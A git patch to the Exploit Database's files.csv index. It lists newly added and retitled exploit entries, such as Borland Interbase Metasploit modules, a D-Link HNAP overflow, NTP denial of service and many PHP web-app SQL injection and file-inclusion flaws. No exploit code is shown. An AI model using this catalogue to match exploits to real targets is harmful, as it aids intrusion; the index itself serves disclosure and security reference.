From dab1517032eba2da45ea80ea4c9b4c871429d8ef Mon Sep 17 00:00:00 2001 
From: Offensive Security
Date: Tue, 22 Nov 2016 05:01:18 +0000
Subject: [PATCH] DB: 2016-11-22
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

13 new exploits

Borland Interbase 2007 - ibserver.exe Buffer Overflow (PoC)
Borland Interbase 2007 - 'ibserver.exe' Buffer Overflow (PoC)

Linux Kernel (Ubuntu / RedHat) - 'keyctl' Null Pointer Dereference
Linux Kernel 4.8.0-22 / 3.10.0-327 (Ubuntu 16.10 / RedHat) - 'keyctl' Null Pointer Dereference

Microsoft Edge Scripting Engine - Memory Corruption (MS16-129)
Microsoft Edge - 'CText­Extractor::Get­Block­Text' Out-of-Bounds Read (MS16-104)
Microsoft Internet Explorer 8 jscript - 'Reg­Exp­Base::FBad­Header' Use-After-Free (MS15-018)
NTP 4.2.8p8 - Denial of Service

Tumbleweed SecureTransport FileTransfer - ActiveX Buffer Overflow
Tumbleweed SecureTransport 4.6.1 FileTransfer - ActiveX Buffer Overflow

Borland Interbase 2007 - PWD_db_aliased Buffer Overflow (Metasploit)
Borland Interbase 2007 - 'PWD_db_aliased' Buffer Overflow (Metasploit)

Borland Interbase 2007 / 2007 SP2 - open_marker_file Buffer Overflow (Metasploit)
Borland Interbase 2007 / 2007 sp2 - jrd8_create_database Buffer Overflow (Metasploit)
Borland Interbase 2007 / 2007 SP2 - INET_connect Buffer Overflow (Metasploit)
Borland Interbase 2007 / 2007 SP2 - 'open_marker_file' Buffer Overflow (Metasploit)
Borland Interbase 2007 / 2007 sp2 - 'jrd8_create_database' Buffer Overflow (Metasploit)
Borland Interbase 2007 / 2007 SP2 - 'INET_connect' Buffer Overflow (Metasploit)

Borland Interbase - isc_create_database() Buffer Overflow (Metasploit)
Borland Interbase - 'isc_create_database()' Buffer Overflow (Metasploit)

Borland Interbase - isc_attach_database() Buffer Overflow (Metasploit)
Borland Interbase - 'isc_attach_database()' Buffer Overflow (Metasploit)

Borland Interbase - SVC_attach() Buffer Overflow (Metasploit)
Borland Interbase - 'SVC_attach()' Buffer Overflow (Metasploit)

Borland Interbase - Create-Request Buffer Overflow (Metasploit)
Borland Interbase - 'Create-Request' Buffer Overflow (Metasploit)

Borland Interbase - PWD_db_aliased() Buffer Overflow (Metasploit)
Borland Interbase - open_marker_file() Buffer Overflow (Metasploit)
Borland Interbase - 'PWD_db_aliased()' Buffer Overflow (Metasploit)
Borland Interbase - 'open_marker_file()' Buffer Overflow (Metasploit)

Borland Interbase - jrd8_create_database() Buffer Overflow (Metasploit)
Borland Interbase - INET_connect() Buffer Overflow (Metasploit)
Borland Interbase - 'jrd8_create_database()' Buffer Overflow (Metasploit)
Borland Interbase - 'INET_connect()' Buffer Overflow (Metasploit)

Dlink DIR Routers - Unauthenticated HNAP Login Stack Buffer Overflow (Metasploit)

phpunity.postcard - (gallery_path) Remote File Inclusion
phpunity.postcard - 'gallery_path' Parameter Remote File Inclusion

CcMail 1.0.1 - (update.php functions_dir) Remote File Inclusion
CcMail 1.0.1 - 'functions_dir' Parameter Remote File Inclusion

1024 CMS 0.7 - (download.php item) Remote File Disclosure
1024 CMS 0.7 - 'download.php' Remote File Disclosure

cpCommerce 1.1.0 - (category.php id_category) SQL Injection
CPCommerce 1.1.0 - 'id_category' Parameter SQL Injection

1024 CMS 1.3.1 - (Local File Inclusion / SQL Injection) Multiple Vulnerabilities
1024 CMS 1.3.1 - Local File Inclusion / SQL Injection

Mole 2.1.0 - (viewsource.php) Remote File Disclosure
ChartDirector 4.1 - (viewsource.php) File Disclosure
724CMS 4.01 Enterprise - (index.php ID) SQL Injection
My Gaming Ladder 7.5 - (ladderid) SQL Injection
Mole 2.1.0 - 'viewsource.php' Remote File Disclosure
ChartDirector 4.1 - 'viewsource.php' File Disclosure
724CMS 4.01 Enterprise - 'index.php' SQL Injection
My Gaming Ladder 7.5 - 'ladderid' Parameter SQL Injection

exbb 0.22 - (Local File Inclusion / Remote File Inclusion) Multiple Vulnerabilities
Pligg CMS 9.9.0 - (editlink.php id) SQL Injection
ExBB 0.22 - Local / Remote File Inclusion
Pligg CMS 9.9.0 - 'editlink.php' SQL Injection

Prediction Football 1.x - (matchid) SQL Injection
Prediction Football 1.x - 'matchid' Parameter SQL Injection

Free Photo Gallery Site Script - (path) File Disclosure
Free Photo Gallery Site Script - 'path' Parameter File Disclosure

LiveCart 1.1.1 - (category id) Blind SQL Injection
Ksemail - 'index.php language' Local File Inclusion
LiveCart 1.1.1 - 'id' Parameter Blind SQL Injection
Ksemail - Local File Inclusion

RX Maxsoft - 'popup_img.php fotoID' SQL Injection
PHPKB Knowledge Base Software 1.5 - 'ID' SQL Injection
RX Maxsoft - 'fotoID' Parameter SQL Injection
PHPKB Knowledge Base Software 1.5 - 'ID' Parameter SQL Injection

Pollbooth 2.0 - (pollID) SQL Injection
cpcommerce 1.1.0 - (Cross-Site Scripting / Local File Inclusion) Multiple Vulnerabilities
Pollbooth 2.0 - 'pollID' Parameter SQL Injection
CPCommerce 1.1.0 - Cross-Site Scripting / Local File Inclusion

SmallBiz eShop - (content_id) SQL Injection
SmallBiz eShop - 'content_id' Parameter SQL Injection

lightneasy sqlite / no database 1.2.2 - Multiple Vulnerabilities
LightNEasy sqlite / no database 1.2.2 - Multiple Vulnerabilities

PostcardMentor - 'step1.asp cat_fldAuto' SQL Injection
PostcardMentor - 'cat_fldAuto' Parameter SQL Injection

Pligg CMS 9.9.0 - (story.php id) SQL Injection
Pligg CMS 9.9.0 - 'story.php' SQL Injection

LokiCMS 0.3.4 - writeconfig() Remote Command Execution
LokiCMS 0.3.4 - 'writeconfig()' Remote Command Execution

cpCommerce 1.2.6 - (URL Rewrite) Input Variable Overwrite / Authentication Bypass
CPCommerce 1.2.6 - (URL Rewrite) Input Variable Overwrite / Authentication Bypass

cpCommerce 1.2.8 - (id_document) Blind SQL Injection
CPCommerce 1.2.8 - 'id_document' Parameter Blind SQL Injection

cpCommerce 1.2.x - GLOBALS[prefix] Arbitrary File Inclusion
CPCommerce 1.2.x - 'GLOBALS[prefix]' Arbitrary File Inclusion

ChartDirector 5.0.1 - (cacheId) Arbitrary File Disclosure
ChartDirector 5.0.1 - 'cacheId' Parameter Arbitrary File Disclosure

Pligg CMS 1.0.4 - (story.php?id) SQL Injection
Pligg CMS 1.0.4 - 'story.php' SQL Injection

724CMS 4.59 Enterprise - SQL Injection
724CMS Enterprise 4.59 - SQL Injection

lightneasy 3.2.2 - Multiple Vulnerabilities
LightNEasy 3.2.2 - Multiple Vulnerabilities

My Postcards 6.0 - MagicCard.cgi Arbitrary File Disclosure
My Postcards 6.0 - 'MagicCard.cgi' Arbitrary File Disclosure

Mambo Open Source 4.0.14 - PollBooth.php Multiple SQL Injection
Mambo Open Source 4.0.14 - 'PollBooth.php' Multiple SQL Injection

PhotoKorn 1.53/1.54 - postcard.php id Parameter SQL Injection
PhotoKorn 1.53/1.54 - 'id' Parameter SQL Injection

CPCommerce 1.1 - Manufacturer.php SQL Injection
CPCommerce 1.1 - 'manufacturer.php' SQL Injection

LiveCart 1.0.1 - user/remindPassword return Parameter Cross-Site Scripting
LiveCart 1.0.1 - category q Parameter Cross-Site Scripting
LiveCart 1.0.1 - order return Parameter Cross-Site Scripting
LiveCart 1.0.1 - user/remindComplete email Parameter Cross-Site Scripting
LiveCart 1.0.1 - 'return' Parameter Cross-Site Scripting
LiveCart 1.0.1 - 'q' Parameter Cross-Site Scripting
LiveCart 1.0.1 - 'return' Parameter Cross-Site Scripting
LiveCart 1.0.1 - 'email' Parameter Cross-Site Scripting

Pligg CMS 1.x - module.php Multiple Parameter Cross-Site Scripting
Pligg CMS 1.x - 'module.php' Multiple Parameter Cross-Site Scripting

Pligg CMS 2.0.2 - (load_data_for_search.php) SQL Injection
Pligg CMS 2.0.2 - 'load_data_for_search.php' SQL Injection

CMS Made Simple 2.1.5 - Cross-Site Scripting
Atlassian Confluence AppFusions Doxygen 1.3.0 - Directory Traversal
WordPress Plugin Instagram Feed 1.4.6.2 - Cross-Site Request Forgery
Mezzanine 4.2.0 - Cross-Site Scripting
LEPTON 2.2.2 - SQL Injection
LEPTON 2.2.2 - Remote Code Execution
FUDforum 3.0.6 - Cross-Site Scripting / Cross-Site Request Forgery
FUDforum 3.0.6 - Local File Inclusion
Wordpress Plugin Olimometer 2.56 - SQL Injection
---
 files.csv                          | 126 ++++++------
 platforms/java/webapps/40794.txt   | 137 +++++++++++++
 platforms/linux/dos/40806.py       |  25 +++
 platforms/linux/local/895.c        |  14 +-
 platforms/multiple/remote/40805.rb | 300 +++++++++++++++++++++++++++++
 platforms/php/webapps/40792.txt    |  21 --
 platforms/php/webapps/40795.html   |  71 +++++++
 platforms/php/webapps/40800.txt    | 113 +++++++++++
 platforms/php/webapps/40801.txt    |  80 ++++++++
 platforms/php/webapps/40802.txt    | 109 +++++++++++
 platforms/php/webapps/40803.txt    |  58 ++++++
 platforms/php/webapps/40804.txt    | 126 ++++++++++++
 platforms/python/webapps/40799.txt |  80 ++++++++
 platforms/windows/dos/40793.html   |  98 ++++++++++
 platforms/windows/dos/40797.html   |  89 +++++++++
 platforms/windows/dos/40798.html   |  49 +++++
 16 files changed, 1406 insertions(+), 90 deletions(-)
 create mode 100755 platforms/java/webapps/40794.txt
 create mode 100755 platforms/linux/dos/40806.py
 create mode 100755 platforms/multiple/remote/40805.rb
 delete mode 100755 platforms/php/webapps/40792.txt
 create mode 100755 platforms/php/webapps/40795.html
 create mode 100755 platforms/php/webapps/40800.txt
 create mode 100755 platforms/php/webapps/40801.txt
 create mode 100755 platforms/php/webapps/40802.txt
 create mode 100755 platforms/php/webapps/40803.txt
 create mode 100755 platforms/php/webapps/40804.txt
 create mode 100755 platforms/python/webapps/40799.txt
 create mode 100755 platforms/windows/dos/40793.html
 create mode 100755 platforms/windows/dos/40797.html
 create mode 100755 platforms/windows/dos/40798.html

diff --git a/files.csv b/files.csv
index c8dee1b1c..7501e4cc5 100755
--- a/files.csv
+++ b/files.csv
@@ -720,7 +720,7 @@ id,file,description,date,author,platform,type,port 5349,platforms/windows/dos/5349.py,"Microsoft Visual InterDev 6.0 SP6 - '.sln' Local Buffer Overflow (PoC)",2008-04-03,shinnai,windows,dos,0 5354,platforms/windows/dos/5354.c,"Xitami Web Server 2.5c2 - LRWP Processing Format String (PoC)",2008-04-03,bratax,windows,dos,0 5396,platforms/windows/dos/5396.txt,"HP OpenView Network Node Manager (OV NNM) 7.53 - Multiple Vulnerabilities",2008-04-07,"Luigi Auriemma",windows,dos,0 -5427,platforms/windows/dos/5427.pl,"Borland Interbase 2007 - ibserver.exe Buffer Overflow (PoC)",2008-04-11,"Liu Zhen Hua",windows,dos,0 +5427,platforms/windows/dos/5427.pl,"Borland Interbase 2007 - 'ibserver.exe' Buffer Overflow (PoC)",2008-04-11,"Liu Zhen Hua",windows,dos,0 5438,platforms/windows/dos/5438.py,"XM Easy Personal FTP Server 5.4.0 - 'XCWD' Denial of Service",2008-04-13,j0rgan,windows,dos,0 5453,platforms/windows/dos/5453.pl,"DivX Player 6.7.0 - '.srt' File Buffer Overflow (PoC)",2008-04-15,securfrog,windows,dos,0 5455,platforms/windows/dos/5455.py,"BS.Player 2.27 Build 959 - '.srt' File Buffer Overflow (PoC)",2008-04-16,j0rgan,windows,dos,0 
@@ -5262,7 +5262,7 @@ id,file,description,date,author,platform,type,port 40747,platforms/windows/dos/40747.html,"Microsoft WININET.dll - CHttp­Header­Parser::Parse­Status­Line Out-of-Bounds Read (MS16-104/MS16-105)",2016-11-10,Skylined,windows,dos,0 40748,platforms/windows/dos/40748.html,"Microsoft Internet Explorer 9<11 MSHTML - PROPERTYDESC::Handle­Style­Component­Property Out-of-Bounds Read (MS16-104)",2016-11-10,Skylined,windows,dos,0 40761,platforms/windows/dos/40761.html,"Microsoft Edge 11.0.10240.16384 - 'edgehtml' CAttr­Array::Destroy Use-After-Free",2016-11-15,Skylined,windows,dos,0 -40762,platforms/linux/dos/40762.c,"Linux Kernel (Ubuntu / RedHat) - 'keyctl' Null Pointer Dereference",2016-11-15,"OpenSource Security",linux,dos,0 +40762,platforms/linux/dos/40762.c,"Linux Kernel 4.8.0-22 / 3.10.0-327 (Ubuntu 16.10 / RedHat) - 'keyctl' Null Pointer Dereference",2016-11-15,"OpenSource Security",linux,dos,0 40766,platforms/windows/dos/40766.txt,"Microsoft Windows Kernel - Registry Hive Loading 'nt!RtlEqualSid' Out-of-Bounds Read (MS16-138)",2016-11-15,"Google Security Research",windows,dos,0 40773,platforms/windows/dos/40773.html,"Microsoft Edge - 'eval' Type Confusion",2016-11-17,"Google Security Research",windows,dos,0 40787,platforms/windows/dos/40787.html,"Microsoft Edge - 'Array.splice' Heap Overflow",2016-11-18,"Google Security Research",windows,dos,0 
@@ -5271,6 +5271,10 @@ id,file,description,date,author,platform,type,port 40785,platforms/windows/dos/40785.html,"Microsoft Edge - 'Array.filter' Info Leak",2016-11-18,"Google Security Research",windows,dos,0 40786,platforms/windows/dos/40786.html,"Microsoft Edge - 'Array.reverse' Overflow",2016-11-18,"Google Security Research",windows,dos,0 40790,platforms/linux/dos/40790.txt,"Palo Alto Networks PanOS appweb3 - Stack Buffer Overflow",2016-11-18,"Google Security Research",linux,dos,0 +40793,platforms/windows/dos/40793.html,"Microsoft Edge Scripting Engine - Memory Corruption (MS16-129)",2016-11-21,Security-Assessment.com,windows,dos,0 +40797,platforms/windows/dos/40797.html,"Microsoft Edge - 'CText­Extractor::Get­Block­Text' Out-of-Bounds Read (MS16-104)",2016-11-21,Skylined,windows,dos,0 +40798,platforms/windows/dos/40798.html,"Microsoft Internet Explorer 8 jscript - 'Reg­Exp­Base::FBad­Header' Use-After-Free (MS15-018)",2016-11-21,Skylined,windows,dos,0 +40806,platforms/linux/dos/40806.py,"NTP 4.2.8p8 - Denial of Service",2016-11-21,"Magnus Klaaborg Stubman",linux,dos,0 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0 
@@ -9585,7 +9589,7 @@ id,file,description,date,author,platform,type,port 5386,platforms/linux/remote/5386.txt,"Apache Tomcat Connector jk2-2.0.2 (mod_jk2) - Remote Overflow",2008-04-06,"INetCop Security",linux,remote,80 5395,platforms/windows/remote/5395.html,"Data Dynamics ActiveBar (Actbar3.ocx 3.2) - Multiple Insecure Methods",2008-04-07,shinnai,windows,remote,0 5397,platforms/windows/remote/5397.txt,"CDNetworks Nefficient Download - 'NeffyLauncher.dll' Code Execution",2008-04-07,"Simon Ryeo",windows,remote,0 -5398,platforms/windows/remote/5398.html,"Tumbleweed SecureTransport FileTransfer - ActiveX Buffer Overflow",2008-04-07,"Patrick Webster",windows,remote,0 +5398,platforms/windows/remote/5398.html,"Tumbleweed SecureTransport 4.6.1 FileTransfer - ActiveX Buffer Overflow",2008-04-07,"Patrick Webster",windows,remote,0 5416,platforms/windows/remote/5416.html,"IBiz E-Banking Integrator 2.0 - ActiveX Edition Insecure Method Exploit",2008-04-09,shinnai,windows,remote,0 5430,platforms/multiple/remote/5430.txt,"HP OpenView Network Node Manager 7.53 - Multiple Vulnerabilities",2008-04-11,"Luigi Auriemma",multiple,remote,0 5445,platforms/windows/remote/5445.cpp,"HP OpenView Network Node Manager (OV NNM) 7.5.1 - ovalarmsrv.exe Remote Overflow",2008-04-14,Heretic2,windows,remote,2954 
@@ -9996,7 +10000,7 @@ id,file,description,date,author,platform,type,port 9951,platforms/multiple/remote/9951.rb,"Squid 2.5.x / 3.x - NTLM Buffer Overflow (Metasploit)",2004-06-08,skape,multiple,remote,3129 9952,platforms/linux/remote/9952.rb,"PoPToP < 1.1.3-b3 / 1.1.3-20030409 - Negative Read Overflow (Metasploit)",2003-04-09,spoonm,linux,remote,1723 9953,platforms/linux/remote/9953.rb,"MySQL 6.0 yaSSL 1.7.5 - Hello Message Buffer Overflow (Metasploit)",2008-01-04,MC,linux,remote,3306 -9954,platforms/linux/remote/9954.rb,"Borland Interbase 2007 - PWD_db_aliased Buffer Overflow (Metasploit)",2007-10-03,"Adriano Lima",linux,remote,3050 +9954,platforms/linux/remote/9954.rb,"Borland Interbase 2007 - 'PWD_db_aliased' Buffer Overflow (Metasploit)",2007-10-03,"Adriano Lima",linux,remote,3050 9957,platforms/windows/remote/9957.txt,"Pegasus Mail Client 4.51 - PoC Buffer Overflow",2009-10-23,"Francis Provencher",windows,remote,0 9966,platforms/windows/remote/9966.txt,"Serv-U Web Client 9.0.0.5 - Buffer Overflow (1)",2009-11-02,"Nikolas Rangos",windows,remote,80 33433,platforms/windows/remote/33433.html,"AoA MP4 Converter 4.1.2 - ActiveX Exploit",2014-05-19,metacom,windows,remote,0 
@@ -10010,9 +10014,9 @@ id,file,description,date,author,platform,type,port 10001,platforms/multiple/remote/10001.txt,"CUPS - 'kerberos' Parameter Cross-Site Scripting",2009-11-11,"Aaron Sigel",multiple,remote,80 10007,platforms/windows/remote/10007.html,"EasyMail Objects 'EMSMTP.DLL 6.0.1' - ActiveX Control Remote Buffer Overflow",2009-11-12,"Will Dormann",windows,remote,0 10011,platforms/hardware/remote/10011.txt,"HP LaserJet Printers - Multiple Persistent Cross-Site Scripting Vulnerabilities",2009-10-07,"Digital Security Research Group",hardware,remote,80 -10019,platforms/linux/remote/10019.rb,"Borland Interbase 2007 / 2007 SP2 - open_marker_file Buffer Overflow (Metasploit)",2007-10-03,"Adriano Lima",linux,remote,3050 -10020,platforms/linux/remote/10020.rb,"Borland Interbase 2007 / 2007 sp2 - jrd8_create_database Buffer Overflow (Metasploit)",2007-10-03,"Adriano Lima",linux,remote,3050 -10021,platforms/linux/remote/10021.rb,"Borland Interbase 2007 / 2007 SP2 - INET_connect Buffer Overflow (Metasploit)",2007-10-03,"Adriano Lima",linux,remote,3050 +10019,platforms/linux/remote/10019.rb,"Borland Interbase 2007 / 2007 SP2 - 'open_marker_file' Buffer Overflow (Metasploit)",2007-10-03,"Adriano Lima",linux,remote,3050 +10020,platforms/linux/remote/10020.rb,"Borland Interbase 2007 / 2007 sp2 - 'jrd8_create_database' Buffer Overflow (Metasploit)",2007-10-03,"Adriano Lima",linux,remote,3050 +10021,platforms/linux/remote/10021.rb,"Borland Interbase 2007 / 2007 SP2 - 'INET_connect' Buffer Overflow (Metasploit)",2007-10-03,"Adriano Lima",linux,remote,3050 10023,platforms/linux/remote/10023.rb,"Salim Gasmi GLD (Greylisting Daemon) 1.0 < 1.4 - Postfix Greylisting Buffer Overflow (Metasploit)",2005-04-12,patrick,linux,remote,2525 10024,platforms/linux/remote/10024.rb,"Madwifi < 0.9.2.1 - SIOCGIWSCAN Buffer Overflow (Metasploit)",2006-12-08,"Julien Tinnes",linux,remote,0 10025,platforms/linux/remote/10025.rb,"University of Washington - imap LSUB Buffer Overflow 
(Metasploit)",2000-04-16,patrick,linux,remote,143 @@ -10511,7 +10515,7 @@ id,file,description,date,author,platform,type,port 16434,platforms/windows/remote/16434.rb,"Borland CaliberRM - StarTeam Multicast Service Buffer Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote,0 16435,platforms/windows/remote/16435.rb,"HP - OmniInet.exe MSG_PROTOCOL Buffer Overflow (Metasploit) (1)",2010-09-20,Metasploit,windows,remote,0 16436,platforms/windows/remote/16436.rb,"Netcat 1.10 - NT Stack Buffer Overflow (Metasploit)",2010-06-22,Metasploit,windows,remote,0 -16437,platforms/windows/remote/16437.rb,"Borland Interbase - isc_create_database() Buffer Overflow (Metasploit)",2010-07-03,Metasploit,windows,remote,0 +16437,platforms/windows/remote/16437.rb,"Borland Interbase - 'isc_create_database()' Buffer Overflow (Metasploit)",2010-07-03,Metasploit,windows,remote,0 16438,platforms/windows/remote/16438.rb,"eIQNetworks ESA - Topology DELETEDEVICE Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,0 16439,platforms/windows/remote/16439.rb,"NetTransport Download Manager 2.90.510 - Buffer Overflow (Metasploit)",2010-08-25,Metasploit,windows,remote,0 16440,platforms/windows/remote/16440.rb,"Firebird Relational Database - isc_attach_database() Buffer Overflow (Metasploit)",2010-07-03,Metasploit,windows,remote,0 
@@ -10521,13 +10525,13 @@ id,file,description,date,author,platform,type,port 16444,platforms/windows/remote/16444.rb,"TinyIdentD 2.2 - Stack Buffer Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,0 16445,platforms/windows/remote/16445.rb,"Bopup Communications Server - Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0 16446,platforms/windows/remote/16446.rb,"UFO: Alien Invasion IRC Client (Windows) - Buffer Overflow (Metasploit)",2010-10-09,Metasploit,windows,remote,0 -16447,platforms/windows/remote/16447.rb,"Borland Interbase - isc_attach_database() Buffer Overflow (Metasploit)",2010-07-03,Metasploit,windows,remote,0 +16447,platforms/windows/remote/16447.rb,"Borland Interbase - 'isc_attach_database()' Buffer Overflow (Metasploit)",2010-07-03,Metasploit,windows,remote,0 16448,platforms/windows/remote/16448.rb,"BakBone NetVault - Remote Heap Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,0 -16449,platforms/windows/remote/16449.rb,"Borland Interbase - SVC_attach() Buffer Overflow (Metasploit)",2010-07-03,Metasploit,windows,remote,0 +16449,platforms/windows/remote/16449.rb,"Borland Interbase - 'SVC_attach()' Buffer Overflow (Metasploit)",2010-07-03,Metasploit,windows,remote,0 16450,platforms/windows/remote/16450.rb,"DoubleTake/HP StorageWorks Storage Mirroring Service - Authentication Overflow (Metasploit)",2010-07-03,Metasploit,windows,remote,0 16451,platforms/windows/remote/16451.rb,"eIQNetworks ESA - License Manager LICMGR_ADDLICENSE Overflow (Metasploit)",2010-09-20,Metasploit,windows,remote,0 16452,platforms/windows/remote/16452.rb,"AgentX++ Master - AgentX::receive_agentx Stack Buffer Overflow (Metasploit)",2010-05-11,Metasploit,windows,remote,0 -16453,platforms/windows/remote/16453.rb,"Borland Interbase - Create-Request Buffer Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote,0 +16453,platforms/windows/remote/16453.rb,"Borland Interbase - 'Create-Request' Buffer Overflow 
(Metasploit)",2010-06-15,Metasploit,windows,remote,0 16454,platforms/windows/remote/16454.rb,"ShixxNOTE 6.net - Font Field Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote,0 16455,platforms/windows/remote/16455.rb,"HP - OmniInet.exe MSG_PROTOCOL Buffer Overflow (Metasploit) (2)",2010-09-20,Metasploit,windows,remote,0 16456,platforms/windows/remote/16456.rb,"Realtek Media Player Playlist - Buffer Overflow (Metasploit)",2010-11-24,Metasploit,windows,remote,0 
@@ -10836,12 +10840,12 @@ id,file,description,date,author,platform,type,port 16836,platforms/linux/remote/16836.rb,"Cyrus IMAPD - pop3d popsubfolders USER Buffer Overflow (Metasploit)",2010-04-30,Metasploit,linux,remote,0 16837,platforms/linux/remote/16837.rb,"hplip - hpssd.py From Address Arbitrary Command Execution (Metasploit)",2010-10-09,Metasploit,linux,remote,0 16838,platforms/linux/remote/16838.rb,"NetSupport Manager Agent - Remote Buffer Overflow (Metasploit) (2)",2011-03-03,Metasploit,linux,remote,0 -16839,platforms/linux/remote/16839.rb,"Borland Interbase - PWD_db_aliased() Buffer Overflow (Metasploit)",2010-07-03,Metasploit,linux,remote,0 -16840,platforms/linux/remote/16840.rb,"Borland Interbase - open_marker_file() Buffer Overflow (Metasploit)",2010-07-03,Metasploit,linux,remote,0 +16839,platforms/linux/remote/16839.rb,"Borland Interbase - 'PWD_db_aliased()' Buffer Overflow (Metasploit)",2010-07-03,Metasploit,linux,remote,0 +16840,platforms/linux/remote/16840.rb,"Borland Interbase - 'open_marker_file()' Buffer Overflow (Metasploit)",2010-07-03,Metasploit,linux,remote,0 16841,platforms/linux/remote/16841.rb,"Salim Gasmi GLD (Greylisting Daemon) - Postfix Buffer Overflow (Metasploit)",2010-07-03,Metasploit,linux,remote,0 16842,platforms/linux/remote/16842.rb,"LPRng - use_syslog Remote Format String (Metasploit)",2010-07-03,Metasploit,linux,remote,0 -16843,platforms/linux/remote/16843.rb,"Borland Interbase - jrd8_create_database() Buffer Overflow (Metasploit)",2010-07-03,Metasploit,linux,remote,0 -16844,platforms/linux/remote/16844.rb,"Borland Interbase - INET_connect() Buffer Overflow (Metasploit)",2010-07-03,Metasploit,linux,remote,0 +16843,platforms/linux/remote/16843.rb,"Borland Interbase - 'jrd8_create_database()' Buffer Overflow (Metasploit)",2010-07-03,Metasploit,linux,remote,0 +16844,platforms/linux/remote/16844.rb,"Borland Interbase - 'INET_connect()' Buffer Overflow (Metasploit)",2010-07-03,Metasploit,linux,remote,0 
16845,platforms/linux/remote/16845.rb,"PoPToP - Negative Read Overflow (Metasploit)",2010-11-23,Metasploit,linux,remote,0 16846,platforms/linux/remote/16846.rb,"UoW IMAPd Server - LSUB Buffer Overflow (Metasploit)",2010-03-26,Metasploit,linux,remote,0 16847,platforms/linux/remote/16847.rb,"Squid - NTLM Authenticate Overflow (Metasploit)",2010-04-30,Metasploit,linux,remote,0 @@ -15081,6 +15085,7 @@ id,file,description,date,author,platform,type,port 40740,platforms/linux_mips/remote/40740.rb,"Eir D1000 Wireless Router - WAN Side Remote Command Injection (Metasploit)",2016-11-08,Kenzo,linux_mips,remote,7547 40767,platforms/windows/remote/40767.rb,"WinaXe 7.7 FTP Client - Remote Buffer Overflow (Metasploit)",2016-11-15,Metasploit,windows,remote,0 40778,platforms/windows/remote/40778.py,"FTPShell Client 5.24 - 'PWD' Remote Buffer Overflow",2016-11-18,Th3GundY,windows,remote,0 +40805,platforms/multiple/remote/40805.rb,"Dlink DIR Routers - Unauthenticated HNAP Login Stack Buffer Overflow (Metasploit)",2016-11-21,Metasploit,multiple,remote,80 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0 
@@ -16485,7 +16490,7 @@ id,file,description,date,author,platform,type,port 2353,platforms/php/webapps/2353.txt,"Vitrax Pre-modded 1.0.6-r3 - Remote File Inclusion",2006-09-12,CeNGiZ-HaN,php,webapps,0 2354,platforms/php/webapps/2354.txt,"Telekorn Signkorn Guestbook 1.3 - (dir_path) Remote File Inclusion",2006-09-12,SHiKaA,php,webapps,0 2356,platforms/php/webapps/2356.txt,"Quicksilver Forums 1.2.1 - (set) Remote File Inclusion",2006-09-13,mdx,php,webapps,0 -2357,platforms/php/webapps/2357.txt,"phpunity.postcard - (gallery_path) Remote File Inclusion",2006-09-13,Rivertam,php,webapps,0 +2357,platforms/php/webapps/2357.txt,"phpunity.postcard - 'gallery_path' Parameter Remote File Inclusion",2006-09-13,Rivertam,php,webapps,0 2359,platforms/php/webapps/2359.txt,"Downstat 1.8 - (art) Remote File Inclusion",2006-09-13,SilenZ,php,webapps,0 2361,platforms/php/webapps/2361.txt,"Shadowed Portal 5.599 - (root) Remote File Inclusion",2006-09-13,mad_hacker,php,webapps,0 2362,platforms/asp/webapps/2362.txt,"TualBLOG 1.0 - (icerikno) SQL Injection",2006-09-13,RMx,asp,webapps,0 
@@ -17254,7 +17259,7 @@ id,file,description,date,author,platform,type,port 3484,platforms/php/webapps/3484.txt,"WebLog - 'index.php' Remote File Disclosure",2007-03-15,Dj7xpl,php,webapps,0 3485,platforms/php/webapps/3485.txt,"Company WebSite Builder PRO 1.9.8 - 'INCLUDE_PATH' Remote File Inclusion",2007-03-15,the_day,php,webapps,0 3486,platforms/php/webapps/3486.txt,"Groupit 2.00b5 - (c_basepath) Remote File Inclusion",2007-03-15,the_day,php,webapps,0 -3487,platforms/php/webapps/3487.pl,"CcMail 1.0.1 - (update.php functions_dir) Remote File Inclusion",2007-03-15,Crackers_Child,php,webapps,0 +3487,platforms/php/webapps/3487.pl,"CcMail 1.0.1 - 'functions_dir' Parameter Remote File Inclusion",2007-03-15,Crackers_Child,php,webapps,0 3489,platforms/php/webapps/3489.txt,"creative Guestbook 1.0 - Multiple Vulnerabilities",2007-03-15,Dj7xpl,php,webapps,0 3490,platforms/php/webapps/3490.txt,"wbblog - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities",2007-03-15,"Mehmet Ince",php,webapps,0 3492,platforms/php/webapps/3492.txt,"WebCalendar 0.9.45 - (includedir) Remote File Inclusion",2007-03-15,Drackanz,php,webapps,0 
